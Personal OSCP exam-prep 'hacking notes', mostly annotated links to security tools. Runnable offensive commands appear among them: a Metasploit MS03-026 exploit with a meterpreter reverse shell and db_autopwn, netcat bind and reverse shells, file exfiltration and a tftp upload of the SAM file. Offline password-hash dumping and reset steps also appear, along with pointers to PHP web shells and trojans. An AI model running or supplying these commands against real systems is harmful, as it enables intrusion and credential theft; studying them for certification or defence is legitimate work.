Hacking Notes
1 disclaimer
I wrote these notes while preparing for the "Offensive Security Certified Professional" exam.
Scripts, links and information on this site are for educational purposes only.
A knife is not bad, but you can do bad things with it.
I hope this site helps others to improve their security skills.
Enjoy it ...
2 security sites
- Offensive Security
- security trainings, creators of backtrack linux
- homepage: http://www.offensive-security.com
- SecurityFocus
- official collection of vulnerabilities
- homepage: http://www.securityfocus.com
- darknet
- useful audit tools
- homepage: http://www.darknet.org.uk
- CVE
- Common Vulnerabilities and Exposures
- homepage: http://cve.mitre.org/
- insecure
- top 100 security tools, and lots of other info and tools
- homepage: http://sectools.org
3 protecting privacy while surfing
- distributed network to hide your web access
- also known as tor proxy
- homepage: http://www.anonymox.net/
3.1 lists of free proxy servers
- http://proxy.speedtest.at/proxyOnlyAnonymous.php
- http://www.hidemyass.com/proxy-list
- http://www.google.com/search?q=anonymous proxy server list
for i in $(cat proxy.txt); do curl -m5 -x "$i" http://www.bitbull.ch/wanip.php >/dev/null 2>&1 && echo "$i"; done
3.2 anonymous emailing
- one time email addresses
- http://www.mailinator.com
- http://www.yopmail.com
- https://www.guerrillamail.com
4 information gathering
4.1 using google
- google advanced search operators
- http://www.googleguide.com/advanced_operators.html
- google hacking database, a nice place
- http://www.hackersforcharity.org/ghdb/
- http://www.exploit-db.com/google-dorks/
4.2 tools
4.2.1 web
./cms-explorer.pl -url http://mybooks.ch -type drupal
./revhosts pig getmail stiftung-buehl.ch
./revhosts pig Findsubdomains stiftung-buehl.ch
./revhosts pig vhh bitbull.ch   # find all virtual hosts on this server
- online domains databases
- Domainsdb: http://www.domainsdb.net/
- IP Hunt: http://www.searchmee.com/web-info/ip-hunt.php
- Reverse IP: http://www.whois.sc/reverse-ip/
- Webhosting.info: http://whois.webhosting.info/
- Serversniff hostnames-on-ip: http://serversniff.net/content.php?do=hostonip
- Zone-h web defacement archive: http://www.zone-h.com/
- MAC address vendor directory
- homepage: http://standards.ieee.org/regauth/oui/index.shtml
- file: http://standards.ieee.org/regauth/oui/oui.txt
- find all active ips in a subnet
arp-scan -I eth0 192.168.1.0/24
5 scanning
- nmap
- excellent port scanner, always kept up to date
- homepage: http://nmap.org
- install nmap by rpm: rpm -Uhv http://nmap.org/dist/$(curl -s http://nmap.org/dist/ | egrep 'nmap-[1-9].*i386.rpm' | cut -d\" -f6 | tail -1)
- install nmap frontend zenmap by: rpm -Uhv http://nmap.org/dist/$(curl -s http://nmap.org/dist/ | grep zenmap | cut -d\" -f6 | tail -1)
- autoscan
- cool scanner, has a nice and easy customizable extension interface
- homepage: http://sourceforge.net/projects/autoscan/
- nessus
- great security scanner, must have
- homepage: http://www.nessus.org
- nikto
- Nikto is a web server scanner which performs comprehensive tests against web servers for multiple security items.
- homepage: http://www.cirt.net/code/nikto.shtml
6 password attacking
6.1 bruteforce tools
- hydra
- remote bruteforce password cracker for nearly all protocols :)
- homepage: http://freeworld.thc.org/releases.php
- rainbow tables
- crack hashes faster by using rainbow tables
- see: http://en.wikipedia.org/wiki/Rainbow_table
- web interface: http://cracker.offensive-security.com/
6.2 password lists
- wyd
- generates word lists from given web content
- homepage: http://www.remote-exploit.org/codes_wyd.html
- bugmenot
- free user accounts for many sites
- homepage: http://www.bugmenot.com
- some password lists
- http://www.milw0rm.com/mil-dic.php
- ftp://ftp.ox.ac.uk/pub/wordlists/
- http://gdataonline.com/downloads/GDict/
- http://www.theargon.com/achilles/wordlists/
- http://theargon.com/achilles/wordlists/theargonlists/
- ftp://ftp.cerias.purdue.edu/pub/dict/
- http://www.outpost9.com/files/WordLists.html
- http://www.securinfos.info/wordlists_dictionnaires.php
- http://www.vulnerabilityassessment.co.uk/passwords.htm
- http://packetstormsecurity.org/Crackers/wordlists/
- http://www.ai.uga.edu/ftplib/natural-language/moby/
- http://www.insidepro.com/eng/download.shtml
- http://www.word-list.com/
- http://www.cotse.com/tools/wordlists1.htm
- http://www.cotse.com/tools/wordlists2.htm
- http://www.phreak.org/index/archive01/hacking/wordlsts/wordlsts.shtml
- http://wordlist.sourceforge.net/
6.3 password dumper
- pwdump
- dump windows passwords
- see: http://en.wikipedia.org/wiki/Pwdump
6.4 physical access
- linux
- boot backtrack3
- copy, read, write /etc/shadow
- use john the ripper to crack it
- get windows password hashes
- boot backtrack3
- mount ntfs filesystem
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
- dump the syskey bootkey from windows system hive
bkhive /mnt/hda1/WINNT/system32/config/system system.txt
- dump password hashes
samdump2 /mnt/hda1/WINNT/system32/config/SAM system.txt > hashes.txt
- set windows passwords
- boot backtrack3
- mount ntfs filesystem
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
- write new password
chntpw /mnt/hda1/WINNT/system32/config/SAM
7 arp poisoning
- ettercap
- nice cli/gui tool for arp poisoning, man in the middle, dns poisoning, traffic modification ...
- homepage: http://ettercap.sourceforge.net/
- cain and abel
- windows tool like ettercap, windows guys like it
- homepage: http://www.oxid.it/
8 traffic analyzer
- wireshark
- well known gui/cli traffic analyzer, imports also tcpdump files
- homepage: http://www.wireshark.org/
- tcpdump
- console traffic analyzer
- homepage: http://sourceforge.net/projects/tcpdump/
- iftop
- tool to monitor and trace bandwidth issues
- homepage: http://www.ex-parrot.com/~pdw/iftop/
- WebScarab
- great http traffic analyzer
- homepage: http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
- WebGoat
- insecure webapp to teach security lessons
- homepage: http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
9 exploiting
- milw0rm
- good collection of exploits and hacking background
- homepage: http://www.milw0rm.com/
- metasploit
- great exploiting framework
- homepage: http://www.metasploit.com/
- install framework3 on FC6: http://www.bitbull.ch/dl/scripts/install-framework3-fc6.sh
9.1 use db_autopwn
./msfconsole
msf > load db_sqlite3
msf > db_create
msf > db_nmap -sV -PN -T4 192.168.0.111
msf > db_autopwn -t
nmap -iL /root/ip.txt -PN -T4 -sV --host-timeout 5min -p21,22,25,80,135,139,110,143,445,443 -oX /tmp/scan.xml
9.2 use msfconsole
./msfconsole
msf > search exploits rpc
msf > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > search payloads windows.*reverse
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms03_026_dcom) > set RHOST 192.168.0.111
msf exploit(ms03_026_dcom) > set LHOST 192.168.0.151
msf exploit(ms03_026_dcom) > set LPORT 55555
msf exploit(ms03_026_dcom) > set

Global
======

No entries in data store.

Module: windows/dcerpc/ms03_026_dcom
====================================

Name                             Value
----                             -----
AutoLoadStdapi                   true
AutoRunScript
ConnectTimeout                   10
DCERPC::ReadTimeout              0
DCERPC::fake_bind_multi          true
DCERPC::fake_bind_multi_append   0
DCERPC::fake_bind_multi_prepend  0
DCERPC::max_frag_size            4096
DCERPC::smb_pipeio               rw
DLL                              /pentest/exploits/framework3/data/meterpreter/metsrv.dll
EXITFUNC                         thread
EnableContextEncoding            false
LHOST                            192.168.0.151
LPORT                            55555
PAYLOAD                          windows/meterpreter/reverse_tcp
RHOST                            192.168.0.111
RPORT                            135
SSL                              false
TARGET                           0
TCP::max_send_size               0
TCP::send_delay                  0
WfsDelay                         0

msf exploit(ms03_026_dcom) > exploit
10 backdoors
10.1 php
- some nice backdoors for unix, php
- google: c99.txt r57.txt c100.txt
- http://www.google.ch/search?hl=de&q=c99.txt+r57.txt+c100.txt+filetype%3Atxt
10.2 windows trojans
- optix pro / beast / bifrost
- some interesting windows trojans
- spybot
- irc based trojan
- insider
- http based trojan, takes instructions by web server
- rxbot
- irc based, self distributing
11 misc tools
- Back Track Linux Distro
- live linux distro for security audit
- http://www.remote-exploit.org/backtrack.html
- chkrootkit
- locally check for rootkits
- homepage: http://www.chkrootkit.org/
- darkc0de
- interesting tools and scripts
- http://darkc0de.com/
- Lynis
- check default config and security settings on a unix box
- homepage: http://www.rootkit.nl/projects/lynis.html
11.1 netcat notes
- simple chat
dst) nc -vv -l 4444
src) nc 192.168.8.110 4444
- file transfer
dst) nc -l 4444 > chris.leo
src) cat chris.leo | nc 192.168.9.10 4444
src) type chris.leo | nc.exe 192.168.9.10 4444   (windows)
- bind shell
dst) nc -l 4444 -e cmd
src) nc 192.168.8.110 4444
- reverse shell
dst) nc -l 4444
src) nc -e cmd 192.168.8.110 4444
- port scanner
nc -z -w1 -v 192.168.9.10 4444-4445
- banner grabber
nc -vv 192.168.9.110 22
11.2 tftp notes
- get files (-i is only for win)
tftp -i 1.2.3.4 GET nc.exe
- put files (-i is only for win)
tftp 2.3.4.5 PUT sam
12 wireless
12.1 links
- web conversion
- convert wpa and wep key into words
- homepage: http://www.latinsud.com/wepconv.html
- aircrack-ng faq
- a must
- homepage: http://aircrack-ng.org/doku.php?id=faq